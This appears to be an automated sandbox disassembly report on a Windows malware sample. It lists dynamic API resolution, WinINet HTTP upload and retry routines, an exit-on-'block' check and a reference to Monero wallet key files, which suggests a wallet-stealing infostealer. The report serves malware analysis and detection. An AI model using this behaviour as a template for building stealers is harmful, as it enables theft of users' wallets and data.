                          control_flow_graph 633 39f20-39f2a 634 39f30-3a341 GetProcAddress * 43 633->634 635 3a346-3a3da LoadLibraryA * 8 633->635 634->635 636 3a456-3a45d 635->636 637 3a3dc-3a451 GetProcAddress * 5 635->637 638 3a463-3a521 GetProcAddress * 8 636->638 639 3a526-3a52d 636->639 637->636 638->639 640 3a5a8-3a5af 639->640 641 3a52f-3a5a3 GetProcAddress * 5 639->641 642 3a647-3a64e 640->642 643 3a5b5-3a642 GetProcAddress * 6 640->643 641->640 644 3a654-3a72a GetProcAddress * 9 642->644 645 3a72f-3a736 642->645 643->642 644->645 646 3a7b2-3a7b9 645->646 647 3a738-3a7ad GetProcAddress * 5 645->647 648 3a7bb-3a7e7 GetProcAddress * 2 646->648 649 3a7ec-3a7f3 646->649 647->646 648->649 650 3a825-3a82c 649->650 651 3a7f5-3a820 GetProcAddress * 2 649->651 652 3a922-3a929 650->652 653 3a832-3a91d GetProcAddress * 10 650->653 651->650 654 3a92b-3a988 GetProcAddress * 4 652->654 655 3a98d-3a994 652->655 653->652 654->655 656 3a996-3a9a9 GetProcAddress 655->656 657 3a9ae-3a9b5 655->657 656->657 658 3a9b7-3aa13 GetProcAddress * 4 657->658 659 3aa18-3aa19 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00FC5A30), ref: 00039F3D
                          • GetProcAddress.KERNEL32(74DD0000,00FC5850), ref: 00039F55
                          • GetProcAddress.KERNEL32(74DD0000,00FD9688), ref: 00039F6E
                          • GetProcAddress.KERNEL32(74DD0000,00FD9640), ref: 00039F86
                          • GetProcAddress.KERNEL32(74DD0000,00FD96B8), ref: 00039F9E
                          • GetProcAddress.KERNEL32(74DD0000,00FD9658), ref: 00039FB7
                          • GetProcAddress.KERNEL32(74DD0000,00FCB9A0), ref: 00039FCF
                          • GetProcAddress.KERNEL32(74DD0000,00FDD380), ref: 00039FE7
                          • GetProcAddress.KERNEL32(74DD0000,00FDD398), ref: 0003A000
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1B8), ref: 0003A018
                          • GetProcAddress.KERNEL32(74DD0000,00FDD308), ref: 0003A030
                          • GetProcAddress.KERNEL32(74DD0000,00FC5870), ref: 0003A049
                          • GetProcAddress.KERNEL32(74DD0000,00FC5890), ref: 0003A061
                          • GetProcAddress.KERNEL32(74DD0000,00FC58B0), ref: 0003A079
                          • GetProcAddress.KERNEL32(74DD0000,00FC58D0), ref: 0003A092
                          • GetProcAddress.KERNEL32(74DD0000,00FDD368), ref: 0003A0AA
                          • GetProcAddress.KERNEL32(74DD0000,00FDD158), ref: 0003A0C2
                          • GetProcAddress.KERNEL32(74DD0000,00FCB6F8), ref: 0003A0DB
                          • GetProcAddress.KERNEL32(74DD0000,00FC5910), ref: 0003A0F3
                          • GetProcAddress.KERNEL32(74DD0000,00FDD320), ref: 0003A10B
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2C0), ref: 0003A124
                          • GetProcAddress.KERNEL32(74DD0000,00FDD248), ref: 0003A13C
                          • GetProcAddress.KERNEL32(74DD0000,00FDD170), ref: 0003A154
                          • GetProcAddress.KERNEL32(74DD0000,00FC5930), ref: 0003A16D
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2D8), ref: 0003A185
                          • GetProcAddress.KERNEL32(74DD0000,00FDD128), ref: 0003A19D
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2F0), ref: 0003A1B6
                          • GetProcAddress.KERNEL32(74DD0000,00FDD0F8), ref: 0003A1CE
                          • GetProcAddress.KERNEL32(74DD0000,00FDD338), ref: 0003A1E6
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2A8), ref: 0003A1FF
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1A0), ref: 0003A217
                          • GetProcAddress.KERNEL32(74DD0000,00FDD350), ref: 0003A22F
                          • GetProcAddress.KERNEL32(74DD0000,00FDD3C8), ref: 0003A248
                          • GetProcAddress.KERNEL32(74DD0000,00FDA3F0), ref: 0003A260
                          • GetProcAddress.KERNEL32(74DD0000,00FDD3B0), ref: 0003A278
                          • GetProcAddress.KERNEL32(74DD0000,00FDD3E0), ref: 0003A291
                          • GetProcAddress.KERNEL32(74DD0000,00FC5970), ref: 0003A2A9
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1D0), ref: 0003A2C1
                          • GetProcAddress.KERNEL32(74DD0000,00FC59B0), ref: 0003A2DA
                          • GetProcAddress.KERNEL32(74DD0000,00FDD290), ref: 0003A2F2
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1E8), ref: 0003A30A
                          • GetProcAddress.KERNEL32(74DD0000,00FC59D0), ref: 0003A323
                          • GetProcAddress.KERNEL32(74DD0000,00FC5E50), ref: 0003A33B
                          • LoadLibraryA.KERNEL32(00FDD218,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A34D
                          • LoadLibraryA.KERNEL32(00FDD110,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A35E
                          • LoadLibraryA.KERNEL32(00FDD140,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A370
                          • LoadLibraryA.KERNEL32(00FDD188,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A382
                          • LoadLibraryA.KERNEL32(00FDD200,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A393
                          • LoadLibraryA.KERNEL32(00FDD230,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A3A5
                          • LoadLibraryA.KERNEL32(00FDD260,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A3B7
                          • LoadLibraryA.KERNEL32(00FDD278,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A3C8
                          • GetProcAddress.KERNEL32(75290000,00FC5DF0), ref: 0003A3EA
                          • GetProcAddress.KERNEL32(75290000,00FDD3F8), ref: 0003A402
                          • GetProcAddress.KERNEL32(75290000,00FD8F08), ref: 0003A41A
                          • GetProcAddress.KERNEL32(75290000,00FDD4D0), ref: 0003A433
                          • GetProcAddress.KERNEL32(75290000,00FC5AB0), ref: 0003A44B
                          • GetProcAddress.KERNEL32(73540000,00FCB7C0), ref: 0003A470
                          • GetProcAddress.KERNEL32(73540000,00FC5B50), ref: 0003A489
                          • GetProcAddress.KERNEL32(73540000,00FCB658), ref: 0003A4A1
                          • GetProcAddress.KERNEL32(73540000,00FDD428), ref: 0003A4B9
                          • GetProcAddress.KERNEL32(73540000,00FDD440), ref: 0003A4D2
                          • GetProcAddress.KERNEL32(73540000,00FC5AD0), ref: 0003A4EA
                          • GetProcAddress.KERNEL32(73540000,00FC5D70), ref: 0003A502
                          • GetProcAddress.KERNEL32(73540000,00FDD458), ref: 0003A51B
                          • GetProcAddress.KERNEL32(752C0000,00FC5C70), ref: 0003A53C
                          • GetProcAddress.KERNEL32(752C0000,00FC5BF0), ref: 0003A554
                          • GetProcAddress.KERNEL32(752C0000,00FDD518), ref: 0003A56D
                          • GetProcAddress.KERNEL32(752C0000,00FDD470), ref: 0003A585
                          • GetProcAddress.KERNEL32(752C0000,00FC5C30), ref: 0003A59D
                          • GetProcAddress.KERNEL32(74EC0000,00FCB928), ref: 0003A5C3
                          • GetProcAddress.KERNEL32(74EC0000,00FCB810), ref: 0003A5DB
                          • GetProcAddress.KERNEL32(74EC0000,00FDD488), ref: 0003A5F3
                          • GetProcAddress.KERNEL32(74EC0000,00FC5B90), ref: 0003A60C
                          • GetProcAddress.KERNEL32(74EC0000,00FC5E10), ref: 0003A624
                          • GetProcAddress.KERNEL32(74EC0000,00FCBAB8), ref: 0003A63C
                          • GetProcAddress.KERNEL32(75BD0000,00FDD4A0), ref: 0003A662
                          • GetProcAddress.KERNEL32(75BD0000,00FC5D90), ref: 0003A67A
                          • GetProcAddress.KERNEL32(75BD0000,00FD8FE8), ref: 0003A692
                          • GetProcAddress.KERNEL32(75BD0000,00FDD500), ref: 0003A6AB
                          • GetProcAddress.KERNEL32(75BD0000,00FDD4B8), ref: 0003A6C3
                          • GetProcAddress.KERNEL32(75BD0000,00FC5D50), ref: 0003A6DB
                          • GetProcAddress.KERNEL32(75BD0000,00FC5AF0), ref: 0003A6F4
                          • GetProcAddress.KERNEL32(75BD0000,00FDD530), ref: 0003A70C
                          • GetProcAddress.KERNEL32(75BD0000,00FDD4E8), ref: 0003A724
                          • GetProcAddress.KERNEL32(75A70000,00FC5C90), ref: 0003A746
                          • GetProcAddress.KERNEL32(75A70000,00FDD548), ref: 0003A75E
                          • GetProcAddress.KERNEL32(75A70000,00FDD560), ref: 0003A776
                          • GetProcAddress.KERNEL32(75A70000,00FDD578), ref: 0003A78F
                          • GetProcAddress.KERNEL32(75A70000,00FDD410), ref: 0003A7A7
                          • GetProcAddress.KERNEL32(75450000,00FC5D10), ref: 0003A7C8
                          • GetProcAddress.KERNEL32(75450000,00FC5B70), ref: 0003A7E1
                          • GetProcAddress.KERNEL32(75DA0000,00FC5DD0), ref: 0003A802
                          • GetProcAddress.KERNEL32(75DA0000,00FDD590), ref: 0003A81A
                          • GetProcAddress.KERNEL32(6F070000,00FC5DB0), ref: 0003A840
                          • GetProcAddress.KERNEL32(6F070000,00FC5B30), ref: 0003A858
                          • GetProcAddress.KERNEL32(6F070000,00FC5BD0), ref: 0003A870
                          • GetProcAddress.KERNEL32(6F070000,00FDD5A8), ref: 0003A889
                          • GetProcAddress.KERNEL32(6F070000,00FC5B10), ref: 0003A8A1
                          • GetProcAddress.KERNEL32(6F070000,00FC5BB0), ref: 0003A8B9
                          • GetProcAddress.KERNEL32(6F070000,00FC5CB0), ref: 0003A8D2
                          • GetProcAddress.KERNEL32(6F070000,00FC5C10), ref: 0003A8EA
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0003A901
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0003A917
                          • GetProcAddress.KERNEL32(75AF0000,00FDD080), ref: 0003A939
                          • GetProcAddress.KERNEL32(75AF0000,00FD8F48), ref: 0003A951
                          • GetProcAddress.KERNEL32(75AF0000,00FDCF78), ref: 0003A969
                          • GetProcAddress.KERNEL32(75AF0000,00FDCF18), ref: 0003A982
                          • GetProcAddress.KERNEL32(75D90000,00FC5C50), ref: 0003A9A3
                          • GetProcAddress.KERNEL32(6CFD0000,00FDCF60), ref: 0003A9C4
                          • GetProcAddress.KERNEL32(6CFD0000,00FC5CD0), ref: 0003A9DD
                          • GetProcAddress.KERNEL32(6CFD0000,00FDCFD8), ref: 0003A9F5
                          • GetProcAddress.KERNEL32(6CFD0000,00FDD050), ref: 0003AA0D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 730e014adce1b4445b1435a75210a422f8ec2426f81540e96393d74e4706f97a
                          • Instruction ID: 123d602cbc18569c60eeea5bec3660d2a7e76ab6e72229330c0795d79f4d07b9
                          • Opcode Fuzzy Hash: 730e014adce1b4445b1435a75210a422f8ec2426f81540e96393d74e4706f97a
                          • Instruction Fuzzy Hash: B8624DB6618200AFC344DFA8FD8C9767BB9E74D7A1710863AF90AC3270D775A954CB60
                          Function 000248D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 248d0-24992 call 3aab0 call 24800 call 3aa50 * 5 InternetOpenA StrCmpCA 816 24994 801->816 817 2499b-2499f 801->817 816->817 818 249a5-24b1d call 38cf0 call 3ac30 call 3abb0 call 3ab10 * 2 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3ac30 call 3abb0 call 3ab10 * 2 InternetConnectA 817->818 819 24f1b-24f43 InternetCloseHandle call 3ade0 call 2a210 817->819 818->819 905 24b23-24b27 818->905 829 24f82-24ff2 call 38b20 * 2 call 3aab0 call 3ab10 * 8 819->829 830 24f45-24f7d call 3ab30 call 3acc0 call 3abb0 call 3ab10 819->830 830->829 906 24b35 905->906 907 24b29-24b33 905->907 908 24b3f-24b72 HttpOpenRequestA 906->908 907->908 909 24b78-24e78 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3aa50 call 3ac30 * 2 call 3abb0 call 3ab10 * 2 call 3ade0 lstrlen call 3ade0 * 2 lstrlen call 3ade0 HttpSendRequestA 908->909 910 24f0e-24f15 InternetCloseHandle 908->910 1021 24e82-24eac InternetReadFile 909->1021 910->819 1022 24eb7-24f09 InternetCloseHandle call 3ab10 1021->1022 1023 24eae-24eb5 1021->1023 1022->910 1023->1022 1024 24eb9-24ef7 call 3acc0 call 3abb0 call 3ab10 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00024965
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 0002498A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00024B0A
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00040DDE,00000000,?,?,00000000,?,",00000000,?,00FDE968), ref: 00024E38
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00024E54
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00024E68
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00024E99
                          • InternetCloseHandle.WININET(00000000), ref: 00024EFD
                          • InternetCloseHandle.WININET(00000000), ref: 00024F15
                          • HttpOpenRequestA.WININET(00000000,00FDEA48,?,00FDE068,00000000,00000000,00400100,00000000), ref: 00024B65
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • InternetCloseHandle.WININET(00000000), ref: 00024F1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: a73b832d06c9f6309557b1e1fc98d07666c327f953b540bcbd3ee4c93e3b343c
                          • Instruction ID: f6333d199e89c5ca1d2de601edac341490b6a7be56b3530de3043d310f225eae
                          • Opcode Fuzzy Hash: a73b832d06c9f6309557b1e1fc98d07666c327f953b540bcbd3ee4c93e3b343c
                          • Instruction Fuzzy Hash: 1C12DC72A10118AACB16EB90DDA6FEEB37DAF15300F1045A9F14666093DF706F48CF66
                          Function 00035760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 35760-357c7 call 35d20 call 3ab30 * 3 call 3aa50 * 4 1106 357cc-357d3 1090->1106 1107 35827-3589c call 3aa50 * 2 call 21590 call 35510 call 3abb0 call 3ab10 call 3ade0 StrCmpCA 1106->1107 1108 357d5-35806 call 3ab30 call 3aab0 call 21590 call 35440 1106->1108 1133 358e3-358f9 call 3ade0 StrCmpCA 1107->1133 1137 3589e-358de call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1107->1137 1124 3580b-35822 call 3abb0 call 3ab10 1108->1124 1124->1133 1140 358ff-35906 1133->1140 1141 35a2c-35a94 call 3abb0 call 3ab30 * 2 call 216b0 call 3ab10 * 4 call 21670 call 21550 1133->1141 1137->1133 1144 35a2a-35aaf call 3ade0 StrCmpCA 1140->1144 1145 3590c-35913 1140->1145 1272 35d13-35d16 1141->1272 1165 35be1-35c49 call 3abb0 call 3ab30 * 2 call 216b0 call 3ab10 * 4 call 21670 call 21550 1144->1165 1166 35ab5-35abc 1144->1166 1146 35915-35969 call 3ab30 call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1145->1146 1147 3596e-359e3 call 3aa50 * 2 call 21590 call 35510 call 3abb0 call 3ab10 call 3ade0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 359e5-35a25 call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1147->1250 1165->1272 1167 35ac2-35ac9 1166->1167 1168 35bdf-35c64 call 3ade0 StrCmpCA 1166->1168 1174 35b23-35b98 call 3aa50 * 2 call 21590 call 35510 call 3abb0 call 3ab10 call 3ade0 StrCmpCA 1167->1174 1175 35acb-35b1e call 3ab30 call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1167->1175 1197 35c66-35c71 Sleep 1168->1197 1198 35c78-35ce1 call 3abb0 call 3ab30 * 2 call 216b0 call 3ab10 * 4 call 21670 call 21550 1168->1198 1174->1168 1276 35b9a-35bda call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
                          APIs
                            • Part of subcall function 0003AB30: lstrlen.KERNEL32(00024F55,?,?,00024F55,00040DDF), ref: 0003AB3B
                            • Part of subcall function 0003AB30: lstrcpy.KERNEL32(00040DDF,00000000), ref: 0003AB95
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035894
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000358F1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035AA7
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00035440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035478
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00035510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035568
                            • Part of subcall function 00035510: lstrlen.KERNEL32(00000000), ref: 0003557F
                            • Part of subcall function 00035510: StrStrA.SHLWAPI(00000000,00000000), ref: 000355B4
                            • Part of subcall function 00035510: lstrlen.KERNEL32(00000000), ref: 000355D3
                            • Part of subcall function 00035510: lstrlen.KERNEL32(00000000), ref: 000355FE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000359DB
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035B90
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035C5C
                          • Sleep.KERNEL32(0000EA60), ref: 00035C6B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 3338d793dee8c092c1b555f5ceebc0516a2232dfaada433a50714068661ff2c1
                          • Instruction ID: 0ea55180d0893321010985f48f5537175df18ed589473db46605c74b9e8cc481
                          • Opcode Fuzzy Hash: 3338d793dee8c092c1b555f5ceebc0516a2232dfaada433a50714068661ff2c1
                          • Instruction Fuzzy Hash: FFE12172A105049ACB15FBA0ED66EFDB37DAF55340F408568B547660A3EF346B08CBA2
                          Function 000319F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 319f0-31a1d call 3ade0 StrCmpCA 1304 31a27-31a41 call 3ade0 1301->1304 1305 31a1f-31a21 ExitProcess 1301->1305 1309 31a44-31a48 1304->1309 1310 31c12-31c1d call 3ab10 1309->1310 1311 31a4e-31a61 1309->1311 1313 31a67-31a6a 1311->1313 1314 31bee-31c0d 1311->1314 1316 31b63-31b74 StrCmpCA 1313->1316 1317 31b82-31b93 StrCmpCA 1313->1317 1318 31b41-31b52 StrCmpCA 1313->1318 1319 31ba1-31bb2 StrCmpCA 1313->1319 1320 31bc0-31bd1 StrCmpCA 1313->1320 1321 31a85-31a94 call 3ab30 1313->1321 1322 31acf-31ae0 StrCmpCA 1313->1322 1323 31aad-31abe StrCmpCA 1313->1323 1324 31a71-31a80 call 3ab30 1313->1324 1325 31a99-31aa8 call 3ab30 1313->1325 1326 31b1f-31b30 StrCmpCA 1313->1326 1327 31bdf-31be9 call 3ab30 1313->1327 1328 31afd-31b0e StrCmpCA 1313->1328 1314->1309 1343 31b80 1316->1343 1344 31b76-31b79 1316->1344 1345 31b95-31b98 1317->1345 1346 31b9f 1317->1346 1341 31b54-31b57 1318->1341 1342 31b5e 1318->1342 1347 31bb4-31bb7 1319->1347 1348 31bbe 1319->1348 1350 31bd3-31bd6 1320->1350 1351 31bdd 1320->1351 1321->1314 1335 31ae2-31aec 1322->1335 1336 31aee-31af1 1322->1336 1333 31ac0-31ac3 1323->1333 1334 31aca 1323->1334 1324->1314 1325->1314 1339 31b32-31b35 1326->1339 1340 31b3c 1326->1340 1327->1314 1337 31b10-31b13 1328->1337 1338 31b1a 1328->1338 1333->1334 1334->1314 1354 31af8 1335->1354 1336->1354 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1314 1344->1343 1345->1346 1346->1314 1347->1348 1348->1314 1350->1351 1351->1314 1354->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00031A15
                          • ExitProcess.KERNEL32 ref: 00031A21
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
